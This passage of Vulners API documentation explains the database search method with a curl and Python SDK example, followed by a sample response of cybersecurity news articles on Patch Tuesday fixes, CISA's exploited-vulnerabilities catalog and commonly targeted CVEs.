Vulners API Methods¶
Introduction¶
This documentation offers a clear guide for developers on how to use the Vulners API. It includes essential API methods for interacting with the Vulners database, such as retrieving OS vulnerabilities, managing collections, utilizing webhooks, and more. Each method is presented with its SDK equivalent (where applicable), CURL commands, required parameters, and expected responses. This guide aims to assist developers in efficiently integrating Vulners' extensive cybersecurity data into their applications and systems.
Additionally, it's important for developers to note that each CURL command within the documentation can include both required and optional parameters to tailor the API request. There is also a "fields" parameter available for specifying which data fields should be returned in the response, allowing for customization based on the developer's needs. For those utilizing the Python SDK, the default fields set for responses are as follows:
- id
- title
- description
- type
- bulletinFamily
- cvss
- published
- modified
- lastseen
- href
- sourceHref
- sourceData
- cvelist
This predefined set ensures that the most relevant information is readily available, while also providing the option to customize the output further by specifying different fields if necessary.
Basics¶
Search in database¶
The database search feature is similar to the search on the Vulners website.
Required parameters:
- query (str): Search query by Lucene syntax
- skip (int):
- size (int): count of output elements
- apiKey: Activated API key
Query:
POST /api/v3/search/lucene/
Query example:
curl -XPOST https://vulners.com/api/v3/search/lucene -H 'Content-Type: application/json' -d '{
"query": "Fortinet AND RCE order:published",
"skip": 0,
"size": 5,
"fields": [
"id",
"published",
"description",
"type",
"title",
"cvelist"],
"apiKey": "{API key}"
}'
database_search_1 = vulners_api.find_all(
"Fortinet AND RCE order:published", limit=5, fields=["published", "title", "description", "cvelist"])
[
{
"cvelist": [
"CVE-2024-20674",
"CVE-2024-20677",
"CVE-2024-20700"
],
"description": "Microsoft has issued patches for 48 security vulnerabilities in the first Patch Tuesday of 2024. With a relatively low number of patches\u2014and only two of them critical\u2014this makes it a relatively quiet month, which is certainly not the norm in January.\n\nThe Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE IDs for the two critical vulnerabilities are:\n\n[CVE-2024-20674](<https://vulners.com/cve/CVE-2024-20674>) is a Windows Kerberos security feature bypass vulnerability with a [CVSS score](<https://www.malwarebytes.com/blog/news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities>) of 9.0 out of 10. An authenticated attacker could exploit this vulnerability by establishing a [machine-in-the-middle (MITM)](<https://www.malwarebytes.com/glossary/man-in-the-middle-mitm>) attack or other local network spoofing technique, then sending a malicious Kerberos message to the client victim machine to spoof itself as the Kerberos authentication server.\n\nKerberos is an authentication protocol that is used to verify the identity of a user or host. To make use of this vulnerability the attacker will need to gain access to the restricted network before being able to run an attack. Nevertheless Microsoft thinks exploitation is \u201cmore likely,\u201d which means the vulnerability could be exploited as part of an attack chain.\n\n[CVE-2024-20700](<https://vulners.com/cve/CVE-2024-20700>) is a Windows Hyper-V Remote Code Execution (RCE) vulnerability with a CVSS score of 7.5 out of 10. Successful exploitation of this vulnerability might be hard because it requires an attacker to win a race condition and they will need to first gain access to the restricted network before running an attack.\n\nHyper-V is the Windows hardware virtualization service. It enables users to create and run a software version of a computer, called a [virtual machine](<https://www.malwarebytes.com/glossary/virtual-machine>). Sometimes these virtual machines are attractive targets for cybercriminals. But the advisory is not very clear on the exact circumstances or context that would allow the RCE.\n\nOne other vulnerability, classified as important, that might turn out to be of interest, at least for some users, is:\n\n[CVE-2024-20677](<https://vulners.com/cve/CVE-2024-20677>) is a Microsoft Office Remote Code Execution (RCE) vulnerability with a CVSS score of 7.8 out of 10. The security vulnerability exists in FBX that could lead to remote code execution. To mitigate this vulnerability, the ability to insert FBX files has been disabled in Word, Excel, PowerPoint and Outlook for Windows and Mac. Versions of Office that had this feature enabled will no longer have access to it. This includes Office 2019, Office 2021, Office LTSC for Mac 2021, and Microsoft 365.\n\nFBX files are a type of 3D model file created using the Autodesk FBX software. When you try to insert an FBX file into Word, Excel, PowerPoint, and Outlook, you will see the following error: \u201cAn error occurred while importing this file.\u201d If you\u2019d like to re-enable this ability, you can find the reasons why you shouldn\u2019t and the method how to do it on this [Microsoft Support page](<https://support.microsoft.com/en-au/topic/support-for-fbx-files-has-been-turned-off-in-office-9f2387f1-84ec-496a-a288-2c6f774db219>).\n\n### Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.\n\n * Adobe [released a patch](<https://helpx.adobe.com/security/products/substance3d_stager/apsb24-06.html>) addressing six CVEs in Substance 3D Stager.\n * Google published the [Android Security Bulletin for January 2024](<https://source.android.com/docs/security/bulletin/2024-01-01>).\n * Fortinet has [released a security update](<https://www.fortiguard.com/psirt/FG-IR-23-315>) to address a vulnerability in FortiOS and FortiProxy software.\n * SAP has released its [January 2024 Patch Day](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) updates.\n\n* * *\n\n**We don\u2019t just report on vulnerabilities\u2014we identify them, and prioritize action.**\n\nCybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using [ThreatDown Vulnerability and Patch Management](<https://www.malwarebytes.com/business/vulnerability-patch-management>).",
"published": "2024-01-10T18:07:38",
"type": "malwarebytes",
"title": "Patch now! First patch Tuesday of 2024 is here"
},
{
"cvelist": [
"CVE-2022-3236",
"CVE-2023-21751",
"CVE-2023-35628",
"CVE-2023-35630",
"CVE-2023-35636",
"CVE-2023-35638",
"CVE-2023-35639",
"CVE-2023-35641",
"CVE-2023-35642",
"CVE-2023-35643",
"CVE-2023-36012",
"CVE-2023-36019"
],
"description": "[![Microsoft](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitNgqCUKiZvap6tAh5CSF1qXS_qapv34Of7TuQ3FMuN7seycUe7Z0tblPbfbeap94-KacqYaL3ILXkD6PnKrR93fbdrEUktLtB7b8P2OBMGf34Nf9GY2ZpYxLJGbimY5UBB6Gp5WsxRtERt2WF3T63g49hi3B8W4GPeKAT4csfIq7pnEFmv06755oLVkA_/s728-rw-ft-e30/windows.jpg>)\n\nMicrosoft released its final set of Patch Tuesday updates for 2023, closing out 34 flaws in its software, making it one of the lightest releases in recent years.\n\nOf the 34 shortcomings, four are rated Critical and 30 are rated Important in severity. The fixes are in addition to [18 flaws](<https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) Microsoft addressed in its Chromium-based Edge browser since the release of [Patch Tuesday updates for November 2023](<https://thehackernews.com/2023/11/alert-microsoft-releases-patch-updates.html>).\n\nAccording to data from the [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2023/12/12/the-december-2023-security-update-review>), the software giant has patched more than 900 flaws this year, making it one of the busiest years for Microsoft patches. For comparison, Redmond [resolved 917 CVEs](<https://www.tenable.com/blog/microsoft-patch-tuesday-2023-year-in-review>) in 2022.\n\nWhile none of the vulnerabilities are listed as publicly known or under active attack at the time of release, some of the notable ones are listed below -\n\n * [**CVE-2023-35628**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35628>) (CVSS score: 8.1) - Windows MSHTML Platform Remote Code Execution Vulnerability\n * [**CVE-2023-35630**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35630>) (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability\n * [**CVE-2023-35636**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636>) (CVSS score: 6.5) - Microsoft Outlook Information Disclosure Vulnerability\n * [**CVE-2023-35639**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35639>) (CVSS score: 8.8) - Microsoft ODBC Driver Remote Code Execution Vulnerability\n * [**CVE-2023-35641**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35641>) (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability\n * [**CVE-2023-35642**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35642>) (CVSS score: 6.5) - Internet Connection Sharing (ICS) Denial-of-Service Vulnerability\n * [**CVE-2023-36019**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36019>) (CVSS score: 9.6) - Microsoft Power Platform Connector Spoofing Vulnerability\n\nCVE-2023-36019 is also significant because it allows the attacker to send a specially crafted URL to the target, resulting in the execution of malicious scripts in the victim's browser on their machine.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/BHcgTukm> \"Cybersecurity\" )\n\n\"An attacker could manipulate a malicious link, application, or file to disguise it as a legitimate link or file to trick the victim,\" Microsoft said in an advisory.\n\nMicrosoft's Patch Tuesday update also plugs three flaws in the Dynamic Host Configuration Protocol (DHCP) server service that could lead to a denial-of-service or information disclosure -\n\n * [**CVE-2023-35638**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35638>) (CVSS score: 7.5) - DHCP Server Service Denial-of-Service Vulnerability\n * [**CVE-2023-35643**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35643>) (CVSS score: 7.5) - DHCP Server Service Information Disclosure Vulnerability\n * [**CVE-2023-36012**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36012>) (CVSS score: 5.3) - DHCP Server Service Information Disclosure Vulnerability\n\nThe disclosure also comes as Akamai discovered a new set of attacks against Active Directory domains that use Microsoft Dynamic Host Configuration Protocol ([DHCP](<https://learn.microsoft.com/en-us/windows-server/networking/technologies/dhcp/dhcp-top>)) servers.\n\n\"These attacks could allow attackers to spoof sensitive DNS records, resulting in varying consequences from credential theft to full Active Directory domain compromise,\" Ori David [said](<https://www.akamai.com/blog/security-research/spoofing-dns-by-abusing-dhcp>) in a report last week. \"The attacks don't require any credentials, and work with the default configuration of [Microsoft DHCP server](<https://www.trustedsec.com/blog/injecting-rogue-dns-records-using-dhcp>).\"\n\nThe web infrastructure and security company further noted the impact of the flaws can be significant as they can be exploited to spoof DNS records on Microsoft DNS servers, including an unauthenticated arbitrary DNS record overwrite, thereby enabling an actor to gain a machine-in-the-middle position on hosts in the domain and access sensitive data.\n\nMicrosoft, in response to the findings, said the \"problems are either by design, or not severe enough to receive a fix,\" necessitating that users Disable DHCP DNS Dynamic Updates if not required and refrain from using DNSUpdateProxy.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/3UvK59NV> \"Cybersecurity\" )\n\n## Software Patches from Other Vendors\n\nOutside of Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Amazon Web Services](<https://aws.amazon.com/security/security-bulletins/>)\n * [Android](<https://source.android.com/docs/security/bulletin/2023-12-01>)\n * [Apache Projects](<https://projects.apache.org/releases.html>) (including [Apache Struts](<https://thehackernews.com/2023/12/new-critical-rce-vulnerability.html>))\n * [Apple](<https://thehackernews.com/2023/12/apple-releases-security-updates-to.html>)\n * [Arm](<https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities>)\n * [Atlassian](<https://thehackernews.com/2023/12/atlassian-releases-critical-software.html>)\n * [Atos](<https://unify.com/en/support/security-advisories>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [CODESYS](<https://www.codesys.com/security/security-reports.html>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Drupal](<https://www.drupal.org/security>)\n * [F5](<https://my.f5.com/manage/s/new-updated-articles#sort=%40f5_updated_published_date%20descending&f:@f5_document_type=\\[Security%20Advisory\\]&periodFilter=0&dateField=1>)\n * [Fortinet](<https://www.fortiguard.com/psirt>)\n * [GitLab](<https://about.gitlab.com/releases/2023/11/30/security-release-gitlab-16-6-1-released/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/>)\n * [Google Chromecast](<https://source.android.com/docs/security/bulletin/chromecast/2023-12-01>)\n * [Google Cloud](<https://cloud.google.com/support/bulletins>)\n * [Google Wear OS](<https://source.android.com/docs/security/bulletin/wear/2023/2023-12-01>)\n * [Hikvision](<https://www.hikvision.com/en/support/cybersecurity/security-advisory/>)\n * [Hitachi Energy](<https://www.hitachienergy.com/in/en/products-and-solutions/cybersecurity/alerts-and-notifications>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [IBM](<https://www.ibm.com/support/pages/bulletin/>)\n * [Jenkins](<https://www.jenkins.io/security/advisories/>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/December-2023>) (including [5Ghoul](<https://thehackernews.com/2023/12/new-5g-modems-flaws-affect-ios-devices.html>))\n * [Mitsubishi Electric](<https://www.mitsubishielectric.com/en/psirt/vulnerability/index.html>)\n * [Mozilla Firefox, Firefox ESR, and Thunderbird](<https://www.mozilla.org/en-US/security/advisories/>)\n * [NETGEAR](<https://www.netgear.com/about/security/>)\n * [NVIDIA](<https://www.nvidia.com/en-us/security/>)\n * [Qualcomm](<https://thehackernews.com/2023/12/qualcomm-releases-details-on-chip.html>) (including [5Ghoul](<https://thehackernews.com/2023/12/new-5g-modems-flaws-affect-ios-devices.html>))\n * [Samsung](<https://security.samsungmobile.com/securityUpdate.smsb>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n * [SolarWinds](<https://www.solarwinds.com/trust-center/security-advisories>)\n * [SonicWall](<https://www.sonicwall.com/search/#t=Support&sort=date%20descending&f:sourceTypeFacetId=\\[Notices\\]&f:@language=\\[English\\]>)\n * [Sophos](<https://www.sophos.com/en-us/security-advisories>) (backports a fix for [CVE-2022-3236](<https://thehackernews.com/2022/09/hackers-actively-exploiting-new-sophos.html>) to unsupported versions of the Sophos Firewall)\n * [Spring Framework](<https://spring.io/security>)\n * [Veritas](<https://www.veritas.com/support/en_US/security/>)\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n * [WordPress](<https://thehackernews.com/2023/12/wordpress-releases-update-642-to.html>)\n * [Zoom](<https://explore.zoom.us/en/trust/security/security-bulletin/>), and\n * [Zyxel](<https://thehackernews.com/2023/12/zyxel-releases-patches-to-fix-15-flaws.html>)\n\n_(The story was updated after publication to modify the number of flaws patched by Microsoft and take into account _[_CVE-2023-21751_](<https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-21751>)_. Microsoft released an advisory for the vulnerability a day after the release of Patch Tuesday updates.)_\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n",
"published": "2023-12-13T05:50:00",
"type": "thn",
"title": "Microsoft's Final 2023 Patch Tuesday: 34 Flaws Fixed, Including 4 Critical"
},
{
"cvelist": [
"CVE-2020-2551",
"CVE-2023-1671",
"CVE-2023-2551",
"CVE-2023-34992",
"CVE-2023-36553",
"CVE-2023-36584",
"CVE-2023-36884"
],
"description": "[![Active Exploitation](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2rDJj_oU45s5bhg6wX-OdktekVTvzeIJh62kVTkBLzgABhLluROoTkebmdE1plaGLH420QMUOaEYPhkIeQJw1gOjuJ7ftYRfoRVgTzPapHioBJtNsO-NuEyh812rT7OdU2IDTq2Q7UsvLjvXsSzr5DqyN9AqVFH8mkmSABiV_vvlAxAD7In4bXr4NJhrt/s728-rw-ft-e30/cisa.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added three security flaws to its Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) catalog based on evidence of active exploitation in the wild.\n\nThe [vulnerabilities](<https://www.cisa.gov/news-events/alerts/2023/11/16/cisa-adds-three-known-exploited-vulnerabilities-catalog>) are as follows -\n\n * [**CVE-2023-36584**](<https://nvd.nist.gov/vuln/detail/CVE-2023-36584>) (CVSS score: 5.4) - Microsoft Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability\n * [**CVE-2023-1671**](<https://nvd.nist.gov/vuln/detail/CVE-2023-1671>) (CVSS score: 9.8) - Sophos Web Appliance Command Injection Vulnerability\n * [**CVE-2020-2551**](<https://nvd.nist.gov/vuln/detail/CVE-2020-2551>) (CVSS score: 9.8) - Oracle Fusion Middleware Unspecified Vulnerability\n\nCVE-2023-1671 relates to a critical [pre-auth command injection vulnerability](<https://vulncheck.com/blog/cve-2023-1671-analysis>) that allows for the execution of arbitrary code. CVE-2020-2551 is a [flaw](<https://www.aon.com/cyber-solutions/aon_cyber_labs/cve-2020-2551-unauthenticated-rce-in-oracle-weblogic/>) in the WLS Core Components that allows an unauthenticated attacker with network access to compromise the WebLogic Server.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/4WnFxcNN> \"Cybersecurity\" )\n\nThere are currently no public reports documenting in-the-wild attacks leveraging CVE-2023-1671, but Cybernews [disclosed](<https://cybernews.com/security/harvard-university-remote-code-execution-attack/>) in July 2023 that it had identified a subdomain of the Harvard University \u2013 courses.my.harvard[.]edu \u2013 that was susceptible to CVE-2020-2551.\n\nOn the other hand, the addition of CVE-2023-36584 to the KEV catalog is based on a report from Palo Alto Networks Unit 42 earlier this week, which [detailed](<https://unit42.paloaltonetworks.com/new-cve-2023-36584-discovered-in-attack-chain-used-by-russian-apt/>) spear-phishing attacks mounted by pro-Russian APT group known as Storm-0978 (aka RomCom or Void Rabisu) targeting groups supporting Ukraine's admission into NATO in July 2023.\n\nCVE-2023-36584, [patched](<https://thehackernews.com/2023/10/microsoft-releases-october-2023-patches.html>) by Microsoft as part of October 2023 security updates, is said to have been used alongside [CVE-2023-36884](<https://www.trellix.com/about/newsroom/stories/research/breaking-down-cve-2023-36884-and-the-infection-chain/>), a Windows remote code execution vulnerability [addressed](<https://thehackernews.com/2023/07/microsoft-releases-patches-for-130.html>) in July, in an exploit chain to deliver [PEAPOD](<https://thehackernews.com/2023/10/new-peapod-cyberattack-campaign.html>), an updated version of RomCom RAT.\n\nIn light of active exploitation, federal agencies are recommended to apply the fixes by December 7, 2023, to secure their networks against potential threats.\n\n## Fortinet Discloses Critical Command Injection Bug in FortiSIEM\n\nThe development comes as Fortinet is alerting customers of a critical command injection vulnerability in FortiSIEM report server ([CVE-2023-36553](<https://nvd.nist.gov/vuln/detail/CVE-2023-36553>), CVSS score: 9.3) that could be exploited by attackers to execute arbitrary commands.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/pjHvTZON> \"Cybersecurity\" )\n\nCVE-2023-36553 has been described as a variant of [CVE-2023-34992](<https://www.fortiguard.com/psirt/FG-IR-23-130>) (CVSS score: 9.7), a similar flaw in the same product that was remediated by Fortinet in early October 2023.\n\n\"An improper neutralization of special elements used in an OS command vulnerability [[CWE-78](<https://cwe.mitre.org/data/definitions/78.html>)] in FortiSIEM report server may allow a remote unauthenticated attacker to execute unauthorized commands via crafted API requests,\" the company [said](<https://www.fortiguard.com/psirt/FG-IR-23-135>) in an advisory this week.\n\nThe vulnerability, which impacts FortiSIEM versions 4.7, 4.9, 4.10, 5.0, 5.1, 5.2, 5.3, and 5.4, has been fixed in versions 7.1.0, 7.0.1, 6.7.6, 6.6.4, 6.5.2, 6.4.3, or later.\n\n### Update\n\nWhen reached for comment on the addition of CVE-2023-1671 to the KEV catalog, Sophos shared the following statement with The Hacker News -\n\n_More than six months ago, on April 4, 2023, we released an automatic patch to all Sophos Web Appliances, as noted in the _[_Security Advisory_](<https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce>)_ on our _[_Trust Center_](<https://www.sophos.com/en-us/trust>)_, and in July 2023, we\u2019ve phased out Sophos Web Appliance as previously planned. We appreciate CISA\u2019s notice for any of the small number of remaining Sophos Web Appliance users who turned off auto-patch and/or missed our ongoing updates, and recommend they upgrade to _[_Sophos Firewall_](<https://www.sophos.com/en-us/products/next-gen-firewall>)_ for optimal network security moving forward._\n\n_(The article was updated after publication to mention that the third security flaw added to the KEV catalog is CVE-2020-2551 and not CVE-2023-2551, which was erroneously referenced in the alert published by CISA.)_\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n",
"published": "2023-11-17T05:57:00",
"type": "thn",
"title": "CISA Adds Three Security Flaws with Active Exploitation to KEV Catalog"
},
{
"cvelist": [
"CVE-2012-0158",
"CVE-2012-0507",
"CVE-2012-1723",
"CVE-2013-0074",
"CVE-2014-6271",
"CVE-2017-0143",
"CVE-2017-0144",
"CVE-2017-0145",
"CVE-2017-0199",
"CVE-2017-11882",
"CVE-2017-8570",
"CVE-2018-0802",
"CVE-2018-13379",
"CVE-2018-8174",
"CVE-2019-11510",
"CVE-2019-19781",
"CVE-2019-2725",
"CVE-2020-1472",
"CVE-2021-26084",
"CVE-2021-26855",
"CVE-2021-31207",
"CVE-2021-34473",
"CVE-2021-34523",
"CVE-2021-44228"
],
"description": "The earlier blog posts showcased an overview of the **vulnerability threat landscape** that is either remotely exploited or most targeted by attackers._ _A quick recap \u2013 We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.\n\nThis blog post will focus on **Qualys\u2019 Top Twenty Vulnerabilities, **targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.\n\nSome of these vulnerabilities are part of the recent [**CISA Joint Cybersecurity Advisory (CSA)**](<https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities>)**,** published on August 3, 2023; you can access it from [**2022 Top Routinely Exploited Vulnerabilities**](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a>)**.**\n\nRead on- \n\n## Stats on the Top 20 Vulnerable Vendors & By-Products\n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Fig-1.-Top-20-Vulnerable-Vendor-1070x694.png)**Fig 1. Top Vulnerable Vendor**\n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Fig-2.-Top-20-Vulnerable-Products-1070x708.png)**Fig 2. Top Vulnerable Products**\n\n## Top Twenty Most Targeted by Attackers\n\n### **1. CVE-2017-11882: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2021, 2022, 2023 (79 times)**\n\nIt was exploited by 467 Malware, 53 Threat Actors, and 14 Ransomware and was trending in the wild as recently as August 31, 2023. \n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\n**Qualys Vulnerability Detection (QID): 110308**\n\nDisclosed in 2017, CVE-2017-11882 is a **significant memory corruption vulnerability** in Microsoft Office's Equation Editor. It could enable an attacker to execute arbitrary code under the current user's permissions. \n\nIf the user has administrative rights, the attacker could gain complete control of the system, install programs, alter data, or create new user accounts with full privileges. This vulnerability will be exploited if the user opens a specially crafted file, potentially sent via email or hosted on a compromised website.\n\nIt\u2019s been primarily exploited in various cyber-attacks and espionage campaigns.\n\n### 2\\. **CVE-2017-0199: Microsoft Wordpad Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (59 times)**\n\nIt was exploited by 93 Malware, 53 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 110297**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2017-0199 is a notable remote code execution vulnerability that affects specific Microsoft Office and WordPad versions precisely when they parse specially crafted files. This vulnerability is the most favored vulnerability by malware, threat actors, and ransomware. \n\nIf successfully exploited, an attacker could execute arbitrary code in the current user's security context, potentially taking control of the system. Exploitation involves a user opening or previewing a maliciously crafted file, often sent via email. Microsoft has addressed this vulnerability by correcting how Office and WordPad parse these files and by enabling certain API functionality in Windows for further resolution.\n\n### 3\\. **CVE-2012-0158: Vulnerability in Windows Common Controls Could Allow RCE**\n\n**Vulnerability Trending Over Years: 2013, 2020, 2021, 2023 (33 times)**\n\nIt was exploited by 63 Malware, 45 Threat Actors, 2 Ransomware and was trending in the wild as recently as August 31, 2023.\n\n**Qualys Vulnerability Detection (QID): 90793**\n\nCVE-2012-0158 is a substantial remote code execution vulnerability in Windows standard controls. An attacker can exploit the flaw by constructing a specially crafted webpage. Upon viewing this webpage, the vulnerability can allow remote code execution, potentially granting the attacker the same rights as the logged-on user. \n\nIf the user has administrative privileges, this could mean total control of the affected system. Disclosed in 2012, this vulnerability has been notably exploited in various cyber-attacks, enabling attackers to install programs, manipulate data, or create new accounts with full user rights.\n\n### 4\\. **CVE-2017-8570: Microsoft Office Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (25 times)**\n\nIt was exploited by 52 Malware 11 Threat Actors and was trending in the wild as recently as September 2, 2023\n\n**Qualys Vulnerability Detection (QID): 110300**\n\nCVE-2017-8570 is a significant remote code execution vulnerability in Microsoft Office and WordPad. It involves the way these applications handle specially crafted files. It can be exploited by an attacker who convinces a user to open a specially designed file, potentially allowing the attacker to run arbitrary code on the victim's machine with the same privileges as the logged-in user and serving as a downloader to other high-profile malware.\n\n### 5\\. **CVE-2020-1472: Zerologon - An Unauthenticated Privilege Escalation to Full Domain Privileges**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2022, 2023 (56 times)**\n\nIt was exploited by 18 Malware, 16 Threat Actors, 11 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):** **91680**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **\n\nCVE-2020-1472, or **Zerologon, is a severe vulnerability in Microsoft's Netlogon Remote Protocol** due to a flawed implementation of AES-CFB8 encryption.\n\nUsing a fixed initialization vector and accepting unencrypted sessions allows an attacker to impersonate a server and compromise the entire Windows domain. The attacker takes control over all the Active Directory identity services.\n\n### 6\\. **CVE-2017-0144, CVE-2017-0145, CVE-2017-0143: Windows SMBv1 Remote Code Execution Vulnerability WannaCry, Petya**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (50 times)**\n\nIt was exploited by 12 Malware, 10 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 1, 2023.\n\n**Qualys Vulnerability Detection (QID): 91361, 91360, 91359, 91345**\n\nCommonly known as Shadow Broker or MS17-010, or "ETERNALBLUE," or "ETERNALSYNERGY" or "ETERNAL ROMANCE" is a remote code execution vulnerability in Microsoft's Server Message Block 1.0 (SMBv1) protocol.\n\nThe vulnerability arises from how SMBv1 handles specific requests, allowing an attacker(usually authenticated) to send a specially crafted packet to an SMBv1 server, enabling them to execute code on the target server.\n\nIt was infamously exploited in the widespread WannaCry ransomware attack in 2017, leading to global data encryption and ransom demands.\n\n### 7\\. **CVE-2012-1723: Java Applet Field Bytecode Verifier Cache Remote Code Execution**\n\n**Vulnerability Trending Over Years: 2023 (6 times)**\n\nIt was exploited by 91 Malware, 8 Threat Actors, 41 Ransomware and was trending in the wild as recently as August 17, 2023.\n\n**Qualys Vulnerability Detection (QID): 120274**\n\nCVE-2012-1723 is a substantial vulnerability found in the Java Runtime Environment. It can be exploited through a malicious web page, hosting a rogue Java applet can be exploited through a malicious web page hosting rogue Java applet.\n\nThe issue, originating from a type-confusion error in the "HotSpot" component, allows untrusted Java applets or applications to bypass the Java sandbox security restrictions and execute arbitrary code on a user's system\n\n### 8\\. **CVE-2021-34473, CVE-2021-34523, CVE-2021-31207: Microsoft Exchange Server RCE (ProxyShell)**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (39 times)**\n\nIt was exploited by 12 Malware, 20 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50114, 50111, 50112**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **\n\nProxyShell, a chain of vulnerabilities that impacts on-premises Microsoft Exchange Servers, is widely used for email and associated services globally.\n\nThese vulnerabilities exist in the Microsoft Client Access Service (CAS), typically running on port 443 in IIS, often exposed to the internet to allow users to access their email remotely. This exposure has led to widespread exploitation by threat actors deploying web shells to execute arbitrary code on compromised devices. They allow an actor to bypass authentication and execute code as a privileged user.\n\n### 9\\. 